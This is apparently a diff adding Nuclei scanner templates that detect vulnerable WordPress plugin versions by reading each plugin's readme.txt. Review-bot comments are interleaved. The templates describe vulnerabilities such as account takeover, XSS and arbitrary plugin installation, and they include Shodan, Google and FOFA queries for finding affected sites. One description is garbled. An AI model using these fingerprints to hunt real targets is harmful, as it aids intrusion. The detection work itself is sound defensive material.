@@ -0,0 +1,59 @@ +id: CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170 + +info: + name: > + Booking & Appointment Plugin for WooCommerce <= 6.9.0 - Authenticated (Subscriber+) Arbitrary Option Update + author: topscoder + severity: low + description: > + The Booking & Appointment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_google_calendar_data' function in versions up to, and including, 6.9.0. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed215da-10c5-469b-bab2-923808feebd4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10729 + metadata: + fofa-query: "wp-content/plugins/woocommerce-booking/" + google-query: inurl:"/wp-content/plugins/woocommerce-booking/" + shodan-query: 'vuln:CVE-2024-10729' + tags: cve,wordpress,wp-plugin,woocommerce-booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.9.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml b/poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml new file mode 100644 index 0000000000..8df4a8591b --- /dev/null 
+++ b/poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce + +info: + name: > + Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.44 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Arbitrary Plugin Installation + author: topscoder + severity: high + description: > + The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an missing empty value check on the 'api_key' value in the 'perform' function in all versions up to, and including, 6.44. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae062c-b084-4045-9407-2d94919993af?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-10781 + metadata: + fofa-query: "wp-content/plugins/cleantalk-spam-protect/" + google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/" + shodan-query: 'vuln:CVE-2024-10781' + tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cleantalk-spam-protect" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.44') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml b/poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml new file mode 100644 index 0000000000..32bd703fd8 --- /dev/null +++ b/poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10813-148804687e2659312d74d49090ab4b03 + +info: + name: > + Product Table for WooCommerce by CodeAstrology (wooproducttable.com) <= 3.5.1 - Information Exposure + author: topscoder + severity: medium + description: > + The Product Table for WooCommerce by CodeAstrology (wooproducttable.com) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.1 via the var_dump_table parameter. This makes it possible for unauthenticated attackers var data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e67f680a-8942-45fa-8458-a27c78045aa1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-10813 + metadata: + fofa-query: "wp-content/plugins/woo-product-table/" + google-query: inurl:"/wp-content/plugins/woo-product-table/" + shodan-query: 'vuln:CVE-2024-10813' + tags: cve,wordpress,wp-plugin,woo-product-table,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-product-table/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-product-table" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file 
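Review bot: The last sentence of `description`, `This makes it possible for unauthenticated attackers var data.`, is garbled and does not say what is exposed. Presumably it should state that unauthenticated attackers can read data dumped via the `var_dump_table` parameter, but that wording should be confirmed against the referenced Wordfence advisory rather than guessed, since the description is what an analyst reads when deciding whether exposure matters on their site.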
diff --git a/poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml b/poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml new file mode 100644 index 0000000000..913ecb5e2e --- /dev/null +++ b/poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd + +info: + name: > + Product Input Fields for WooCommerce <= 1.9 - Authenticated (Contributor+) Arbitrary File Read + author: topscoder + severity: low + description: > + The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.9 via the handle_downloads() function due to insufficient file path validation/sanitization. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-10857 + metadata: + fofa-query: "wp-content/plugins/product-input-fields-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/product-input-fields-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-10857' + tags: cve,wordpress,wp-plugin,product-input-fields-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-input-fields-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-input-fields-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml b/poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml new file mode 100644 index 0000000000..2a8d62e021 --- /dev/null +++ b/poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml 
@@ -0,0 +1,59 @@
+id: CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e
+
+info:
+ name: >
+ Enter Addons – Ultimate Template Builder for Elementor <= 2.1.9 - Authenticated (Contributor+) Post Disclosure
+ author: topscoder
+ severity: low
+ description: >
+ The Enter Addons – Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.9 via the Advanced Tabs widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff8e8889-ec02-4b8d-9509-2c6335fdd9a4?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-10868
+ metadata:
+ fofa-query: "wp-content/plugins/enteraddons/"
+ google-query: inurl:"/wp-content/plugins/enteraddons/"
+ shodan-query: 'vuln:CVE-2024-10868'
+ tags: cve,wordpress,wp-plugin,enteraddons,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/enteraddons/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "enteraddons"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml b/poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml
new file mode 100644
index 0000000000..77e888bf8b
--- /dev/null
+++ b/poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11002-bb89910755dac308dc83c1e533f25239
+
+info:
+ name: >
+ InPost Gallery <= 2.1.4.2 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via inpost_gallery_get_shortcode_template
+ author: topscoder
+ severity: low
+ description: >
+ The The InPost Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution via the inpost_gallery_get_shortcode_template AJAX action in all versions up to, and including, 2.1.4.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
+ cvss-score: 6.3
+ cve-id: CVE-2024-11002
+ metadata:
+ fofa-query: "wp-content/plugins/inpost-gallery/"
+ google-query: inurl:"/wp-content/plugins/inpost-gallery/"
+ shodan-query: 'vuln:CVE-2024-11002'
+ tags: cve,wordpress,wp-plugin,inpost-gallery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/inpost-gallery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "inpost-gallery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.4.2')
\ No newline at end of file
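Review bot: The `description` opens with a doubled article, `The The InPost Gallery plugin for WordPress is vulnerable…`, and that text is what ends up in scanner output; `The InPost Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution…` reads correctly. Since these files appear to be generated from the Wordfence feed, the fix presumably belongs in the generator or the upstream record as well, otherwise the next regeneration will reintroduce it.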
diff --git a/poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml b/poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml
new file mode 100644
index 0000000000..0f7bbe3ba0
--- /dev/null
+++ b/poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e
+
+info:
+ name: >
+ AppPresser – Mobile App Framework <= 4.4.6 - Unauthenticated Privilege Escalation via Password Reset
+ author: topscoder
+ severity: critical
+ description: >
+ The AppPresser – Mobile App Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.4.6. This is due to the plugin not properly validating a user's password reset code prior to updating their password. This makes it possible for unauthenticated attackers, with knowledge of a user's email address, to reset the user's password and gain access to their account.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43cb0399-4add-43d5-863c-30e11803bd90?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-11024
+ metadata:
+ fofa-query: "wp-content/plugins/apppresser/"
+ google-query: inurl:"/wp-content/plugins/apppresser/"
+ shodan-query: 'vuln:CVE-2024-11024'
+ tags: cve,wordpress,wp-plugin,apppresser,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/apppresser/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "apppresser"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.4.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml b/poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml
new file mode 100644
index 0000000000..72a5c67f59
--- /dev/null
+++ b/poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7
+
+info:
+ name: >
+ Parsi Date <= 5.1.1 - Reflected Cross-Site Scripting via add_query_arg Parameter
+ author: topscoder
+ severity: medium
+ description: >
+ The Parsi Date plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11032
+ metadata:
+ fofa-query: "wp-content/plugins/wp-parsidate/"
+ google-query: inurl:"/wp-content/plugins/wp-parsidate/"
+ shodan-query: 'vuln:CVE-2024-11032'
+ tags: cve,wordpress,wp-plugin,wp-parsidate,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-parsidate/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-parsidate"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.1.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml b/poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml
new file mode 100644
index 0000000000..b9373d77b3
--- /dev/null
+++ b/poc/cve/CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11091-f4e3a11a24e59ca5d94c2f2172581867
+
+info:
+ name: >
+ Support SVG – Upload svg files in wordpress without hassle <= 1.1.0 - Authenticated (Author+) Stored Cross-site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Support SVG – Upload svg files in wordpress without hassle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d9207baf-348c-4d3b-a6f0-cbfcd2624f78?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11091
+ metadata:
+ fofa-query: "wp-content/plugins/support-svg/"
+ google-query: inurl:"/wp-content/plugins/support-svg/"
+ shodan-query: 'vuln:CVE-2024-11091'
+ tags: cve,wordpress,wp-plugin,support-svg,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/support-svg/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "support-svg"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.0')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml b/poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
new file mode 100644
index 0000000000..285f4876ec
--- /dev/null
+++ b/poc/cve/CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11119-91fb399971cf3dbe2eb559f4abe09be9
+
+info:
+ name: >
+ BNE Gallery Extended <= 1.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via gallery Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The BNE Gallery Extended plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gallery' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1f9277d8-ac81-4950-a1e5-4e6c6b042f84?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11119
+ metadata:
+ fofa-query: "wp-content/plugins/bne-gallery-extended/"
+ google-query: inurl:"/wp-content/plugins/bne-gallery-extended/"
+ shodan-query: 'vuln:CVE-2024-11119'
+ tags: cve,wordpress,wp-plugin,bne-gallery-extended,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bne-gallery-extended/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bne-gallery-extended"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml b/poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml
new file mode 100644
index 0000000000..0bc99c792d
--- /dev/null
+++ b/poc/cve/CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11192-f9cdc74b63f8a1703a5c2e8957a1d4a9
+
+info:
+ name: >
+ Spotify Play Button for WordPress <= 2.11 - Authenticated (Contributor+) Stored Cross-Site Scripting via spotifyplaybutton Shortcode
+ author: topscoder
+ severity: low
+ description: >
+ The Spotify Play Button for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's spotifyplaybutton shortcode in all versions up to, and including, 2.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a52e43dd-46b4-445b-b350-a2fd76315869?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-11192
+ metadata:
+ fofa-query: "wp-content/plugins/spotify-play-button-for-wordpress/"
+ google-query: inurl:"/wp-content/plugins/spotify-play-button-for-wordpress/"
+ shodan-query: 'vuln:CVE-2024-11192'
+ tags: cve,wordpress,wp-plugin,spotify-play-button-for-wordpress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/spotify-play-button-for-wordpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "spotify-play-button-for-wordpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.11')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml b/poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml
new file mode 100644
index 0000000000..2f155351ae
--- /dev/null
+++ b/poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-32578cc7038a4c251703cadebc084ad8
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-email-blacklist/"
+ google-query: inurl:"/wp-content/plugins/cm-email-blacklist/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-email-blacklist,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-email-blacklist/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-email-blacklist"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml b/poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml
new file mode 100644
index 0000000000..d819ed817c
--- /dev/null
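Review bot: `name` reads `Multiple Plugins <= (Various Versions) - …`, so this template and the six other CVE-2024-11202 files in this commit (slugs cm-video-lesson-manager, enhanced-tooltipglossary, cm-business-directory, cm-pop-up-banners, cm-on-demand-search-and-replace and cm-header-footer-script-loader) are indistinguishable in scanner output except by the hash suffix of `id`. Each file already pins exactly one slug and one version ceiling, so the name should carry them, e.g. here `cm-email-blacklist <= 1.5.3 - Reflected Cross-Site Scripting via cminds_free_guide Shortcode`, and `description` could likewise state which plugin and ceiling this particular check covers. Sharing `shodan-query: 'vuln:CVE-2024-11202'` across all seven is fine, but a reader of a single alert otherwise cannot tell which product was flagged without opening the template.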
+++ b/poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-52e2ce4340581c57296ec17159d2460d
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
+ fofa-query: "wp-content/plugins/cm-video-lesson-manager/"
+ google-query: inurl:"/wp-content/plugins/cm-video-lesson-manager/"
+ shodan-query: 'vuln:CVE-2024-11202'
+ tags: cve,wordpress,wp-plugin,cm-video-lesson-manager,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cm-video-lesson-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cm-video-lesson-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml b/poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml
new file mode 100644
index 0000000000..3ef68e0ec9
--- /dev/null
+++ b/poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-11202-77caff140b8bc5be998ac80c9386051c
+
+info:
+ name: >
+ Multiple Plugins <= (Various Versions) - Reflected Cross-Site Scripting via cminds_free_guide Shortcode
+ author: topscoder
+ severity: medium
+ description: >
+ Multiple plugins for WordPress are vulnerable to Reflected Cross-Site Scripting via the cminds_free_guide shortcode in various versions due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/db759c60-9ce9-407d-8d1f-cbbfd09759d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-11202
+ metadata:
